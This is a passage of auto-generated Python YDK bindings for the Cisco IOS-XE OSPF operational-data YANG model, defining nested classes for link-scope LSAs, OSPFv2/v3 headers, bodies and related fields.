        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)


class LinkScopeLsas(Entity):
    """List of link-scope LSAs of an OSPF instance; keyed by 'lsa_type'."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, self).__init__()

        self.yang_name = "link-scope-lsas"
        self.yang_parent_name = "ospf-instance"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['lsa_type']
        self._child_classes = OrderedDict([
            ("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa)),
            ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa)),
        ])
        self._leafs = OrderedDict([
            ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
        ])
        self.lsa_type = None

        self.link_scope_lsa = YList(self)
        self.area_scope_lsa = YList(self)
        self._segment_path = lambda: "link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, ['lsa_type'], name, value)


    class LinkScopeLsa(Entity):
        """Link-scope LSA entry keyed by ('lsa_id', 'adv_router').

        __init__ continues past the end of this chunk.
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, self).__init__()

            self.yang_name = "link-scope-lsa"
            self.yang_parent_name = "link-scope-lsas"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['lsa_id','adv_router']
            self._child_classes = OrderedDict([
                ("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)),
                ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link)),
                ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology)),
                ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External)),
                ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)),
                ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)),
                ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link)),
                ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)),
                ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)),
                ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology)),
                ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv)),
                ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv)),
            ])
            self._leafs = OrderedDict([
                ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
                ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
                ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
                ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
                ('version', (YLeaf(YType.uint32, 'version'), ['int'])),
                ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])),
            ])
            self.lsa_id = None
            self.adv_router = None
            self.decoded_completed = None
            self.raw_data = []
            self.version = None
            self.router_address = None

            self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa()
            self.ospfv2_lsa.parent = self
            self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal() self.ospfv3_lsa_val.parent = self self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val" self.tlv = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv() self.tlv.parent = self self._children_name_map["tlv"] = "tlv" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv2_unknown_tlv = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix_list = YList(self) self.ospfv3_ia_prefix = YList(self) self.multi_topology = YList(self) self.unknown_sub_tlv = YList(self) self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value) class Ospfv2Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = 
"lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" 
self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, 
['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): 
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): 
self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv2UnknownTlv(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__() self.yang_name = "ospfv2-unknown-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value) class Ospfv3LsaVal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__() self.yang_name = "ospfv3-lsa-val" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = 
OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', 
(YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))]) self._leafs = 
OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, 
self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True 
self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = 
OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = 
